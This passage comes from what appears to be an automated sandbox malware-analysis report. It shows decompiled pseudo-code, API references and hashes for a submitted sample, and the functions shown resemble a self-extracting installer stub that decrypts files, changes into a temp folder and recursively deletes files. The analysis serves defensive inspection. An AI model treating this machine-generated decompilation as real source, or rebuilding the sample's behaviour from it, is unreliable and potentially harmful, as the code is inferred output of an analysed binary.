                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xde8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xde8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xde9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E00DE256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xde8a24; // 0x0
                                                                                                                                                                                                        									 *0xde9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xde8a38;
                                                                                                                                                                                                        										if( *0xde8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00DE4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xde9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00DE3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xde8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00DE3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E00DE44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xde9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00DE621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xde8a24;
                                                                                                                                                                                                        				if( *0xde8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00DE3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00DE51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xde8a38;
                                                                                                                                                                                                        				if( *0xde8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00de2f1d
                                                                                                                                                                                                        0x00de2f28
                                                                                                                                                                                                        0x00de2f2f
                                                                                                                                                                                                        0x00de2f3d
                                                                                                                                                                                                        0x00de2f6c
                                                                                                                                                                                                        0x00de2f6c
                                                                                                                                                                                                        0x00de2f71
                                                                                                                                                                                                        0x00de2f73
                                                                                                                                                                                                        0x00de3041
                                                                                                                                                                                                        0x00de3041
                                                                                                                                                                                                        0x00de3043
                                                                                                                                                                                                        0x00de3053
                                                                                                                                                                                                        0x00de3053
                                                                                                                                                                                                        0x00de2f79
                                                                                                                                                                                                        0x00de2f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2f86
                                                                                                                                                                                                        0x00de2f86
                                                                                                                                                                                                        0x00de2f93
                                                                                                                                                                                                        0x00de2f9e
                                                                                                                                                                                                        0x00de2fa0
                                                                                                                                                                                                        0x00de2fa6
                                                                                                                                                                                                        0x00de2fb8
                                                                                                                                                                                                        0x00de2fba
                                                                                                                                                                                                        0x00de2fbe
                                                                                                                                                                                                        0x00de2fc6
                                                                                                                                                                                                        0x00de2fcc
                                                                                                                                                                                                        0x00de2fd4
                                                                                                                                                                                                        0x00de2fd6
                                                                                                                                                                                                        0x00de2fd8
                                                                                                                                                                                                        0x00de2fe0
                                                                                                                                                                                                        0x00de2fe6
                                                                                                                                                                                                        0x00de2fee
                                                                                                                                                                                                        0x00de2ff0
                                                                                                                                                                                                        0x00de2ff5
                                                                                                                                                                                                        0x00de2ff5
                                                                                                                                                                                                        0x00de2fee
                                                                                                                                                                                                        0x00de2fd4
                                                                                                                                                                                                        0x00de2ff8
                                                                                                                                                                                                        0x00de2ffe
                                                                                                                                                                                                        0x00de3004
                                                                                                                                                                                                        0x00de3017
                                                                                                                                                                                                        0x00de301c
                                                                                                                                                                                                        0x00de3024
                                                                                                                                                                                                        0x00de3054
                                                                                                                                                                                                        0x00de305a
                                                                                                                                                                                                        0x00de3065
                                                                                                                                                                                                        0x00de3065
                                                                                                                                                                                                        0x00de306c
                                                                                                                                                                                                        0x00de306e
                                                                                                                                                                                                        0x00de3075
                                                                                                                                                                                                        0x00de307a
                                                                                                                                                                                                        0x00de307a
                                                                                                                                                                                                        0x00de307c
                                                                                                                                                                                                        0x00de3081
                                                                                                                                                                                                        0x00de3087
                                                                                                                                                                                                        0x00de3089
                                                                                                                                                                                                        0x00de30a1
                                                                                                                                                                                                        0x00de30a1
                                                                                                                                                                                                        0x00de30a9
                                                                                                                                                                                                        0x00de30ab
                                                                                                                                                                                                        0x00de30ad
                                                                                                                                                                                                        0x00de30af
                                                                                                                                                                                                        0x00de30af
                                                                                                                                                                                                        0x00de30ad
                                                                                                                                                                                                        0x00de30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de308b
                                                                                                                                                                                                        0x00de308b
                                                                                                                                                                                                        0x00de3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3093
                                                                                                                                                                                                        0x00de3098
                                                                                                                                                                                                        0x00de309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de309c
                                                                                                                                                                                                        0x00de3089
                                                                                                                                                                                                        0x00de305c
                                                                                                                                                                                                        0x00de3061
                                                                                                                                                                                                        0x00de3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3063
                                                                                                                                                                                                        0x00de302b
                                                                                                                                                                                                        0x00de3032
                                                                                                                                                                                                        0x00de303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de303c
                                                                                                                                                                                                        0x00de3006
                                                                                                                                                                                                        0x00de300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de300e
                                                                                                                                                                                                        0x00de3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3015
                                                                                                                                                                                                        0x00de2f80
                                                                                                                                                                                                        0x00de2f3f
                                                                                                                                                                                                        0x00de2f46
                                                                                                                                                                                                        0x00de2f5f
                                                                                                                                                                                                        0x00de2f5f
                                                                                                                                                                                                        0x00de2f64
                                                                                                                                                                                                        0x00de2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2f66
                                                                                                                                                                                                        0x00de2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2f55
                                                                                                                                                                                                        0x00de2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00DE2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00DE2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00DE2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00DE2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE301C
                                                                                                                                                                                                          • Part of subcall function 00DE51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F4D,?,00000002,00000000), ref: 00DE5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-2364573593
                                                                                                                                                                                                        • Opcode ID: 5d5ea896da9afda0dd569b4c2ce0032242e64f2642960967b7dc670b52b7fb36
                                                                                                                                                                                                        • Instruction ID: 66cc4d9e79eba397a3ddb3d5389832e6f97e3fc546d39357e7da003b2e9b1507
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d5ea896da9afda0dd569b4c2ce0032242e64f2642960967b7dc670b52b7fb36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B419C30A007C59ADB30BF77AD8967A77A8EF54794F080079A945CB291EB74CE84CA71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00DE6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00DE16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00DE1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00DE16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00DE16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00DE658A( &_v280, 0x104, 0xde1140);
                                                                                                                                                                                                        								E00DE2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        0x00de2398
                                                                                                                                                                                                        0x00de239e
                                                                                                                                                                                                        0x00de23a3
                                                                                                                                                                                                        0x00de23a5
                                                                                                                                                                                                        0x00de23ae
                                                                                                                                                                                                        0x00de23b3
                                                                                                                                                                                                        0x00de24cb
                                                                                                                                                                                                        0x00de24d2
                                                                                                                                                                                                        0x00de24d3
                                                                                                                                                                                                        0x00de24d4
                                                                                                                                                                                                        0x00de24df
                                                                                                                                                                                                        0x00de23c2
                                                                                                                                                                                                        0x00de23d1
                                                                                                                                                                                                        0x00de23db
                                                                                                                                                                                                        0x00de23e4
                                                                                                                                                                                                        0x00de23f6
                                                                                                                                                                                                        0x00de23fc
                                                                                                                                                                                                        0x00de2401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2407
                                                                                                                                                                                                        0x00de2407
                                                                                                                                                                                                        0x00de2408
                                                                                                                                                                                                        0x00de2411
                                                                                                                                                                                                        0x00de241f
                                                                                                                                                                                                        0x00de247a
                                                                                                                                                                                                        0x00de2483
                                                                                                                                                                                                        0x00de2495
                                                                                                                                                                                                        0x00de24a3
                                                                                                                                                                                                        0x00de2421
                                                                                                                                                                                                        0x00de242f
                                                                                                                                                                                                        0x00de2453
                                                                                                                                                                                                        0x00de245d
                                                                                                                                                                                                        0x00de2466
                                                                                                                                                                                                        0x00de2472
                                                                                                                                                                                                        0x00de2472
                                                                                                                                                                                                        0x00de242f
                                                                                                                                                                                                        0x00de24af
                                                                                                                                                                                                        0x00de24b5
                                                                                                                                                                                                        0x00de24be
                                                                                                                                                                                                        0x00de24c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de24c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00DE8A3A,00DE11F4,00DE8A3A,00000000,?,?), ref: 00DE23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00DE11F8), ref: 00DE2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00DE11FC), ref: 00DE243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00DE2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00DE24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00DE24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00DE24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00DE8A3A), ref: 00DE24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 825b736b77a3134b11140cc583efbd448899f0569b45e481124ca21a918c1cc6
                                                                                                                                                                                                        • Instruction ID: a51565cab4832fbdd449f773ac9b8631fc341e6094ad006f75700ad2dd4d29ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 825b736b77a3134b11140cc583efbd448899f0569b45e481124ca21a918c1cc6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC316F326047C19BD320FB69CC89AEB77ACAFD4315F04492DB599C6290EB74A90D8772
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00DE2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xdea288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xde9124 = 0;
                                                                                                                                                                                                        				if(E00DE2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00DE2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00DE52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xde8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xde9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00DE1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xde8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xde9124; // 0x0
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de2c03
                                                                                                                                                                                                        0x00de2c0d
                                                                                                                                                                                                        0x00de2c18
                                                                                                                                                                                                        0x00de2c20
                                                                                                                                                                                                        0x00de2c2e
                                                                                                                                                                                                        0x00de2c32
                                                                                                                                                                                                        0x00de2c36
                                                                                                                                                                                                        0x00de2c3d
                                                                                                                                                                                                        0x00de2c43
                                                                                                                                                                                                        0x00de2c45
                                                                                                                                                                                                        0x00de2c47
                                                                                                                                                                                                        0x00de2c49
                                                                                                                                                                                                        0x00de2c4e
                                                                                                                                                                                                        0x00de2c4e
                                                                                                                                                                                                        0x00de2c47
                                                                                                                                                                                                        0x00de2c32
                                                                                                                                                                                                        0x00de2c20
                                                                                                                                                                                                        0x00de2c50
                                                                                                                                                                                                        0x00de2c54
                                                                                                                                                                                                        0x00de2c57
                                                                                                                                                                                                        0x00de2c64
                                                                                                                                                                                                        0x00de2c66
                                                                                                                                                                                                        0x00de2c6b
                                                                                                                                                                                                        0x00de2c6d
                                                                                                                                                                                                        0x00de2c74
                                                                                                                                                                                                        0x00de2c76
                                                                                                                                                                                                        0x00de2c7c
                                                                                                                                                                                                        0x00de2c7e
                                                                                                                                                                                                        0x00de2c87
                                                                                                                                                                                                        0x00de2c89
                                                                                                                                                                                                        0x00de2c89
                                                                                                                                                                                                        0x00de2c87
                                                                                                                                                                                                        0x00de2c7c
                                                                                                                                                                                                        0x00de2c74
                                                                                                                                                                                                        0x00de2c8e
                                                                                                                                                                                                        0x00de2c95
                                                                                                                                                                                                        0x00de2c98
                                                                                                                                                                                                        0x00de2c98
                                                                                                                                                                                                        0x00de2c9e
                                                                                                                                                                                                        0x00de2ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00DE2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00DE6BB0,00DE0000,00000000,00000002,0000000A), ref: 00DE2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 1966205c8556846975aab7a8bd750243b4ede3c23a9a37bdd4244315c4872b31
                                                                                                                                                                                                        • Instruction ID: 46e688de6ab5a2cd98954d6e08ea2870216221fc5e4e30784ff0248c3ac3035c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1966205c8556846975aab7a8bd750243b4ede3c23a9a37bdd4244315c4872b31
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA11C2712403C69BD7207BBBECC9A7E776DDB84390B290025F905EB355DA70EC418675
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00DE6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00de6f45
                                                                                                                                                                                                        0x00de6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00DE6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: b2794989be34a55729d1f746dc5867d2781de239e5fc11d44d9dbadd3ed44829
                                                                                                                                                                                                        • Instruction ID: b1eb889bc64f2b04dd0199af9e7e9fdaa339551153aed773560805569913ef70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2794989be34a55729d1f746dc5867d2781de239e5fc11d44d9dbadd3ed44829
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D59002642513814B96103B759D5942579915A6EA42B819460B011C85D4DB6090445532
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
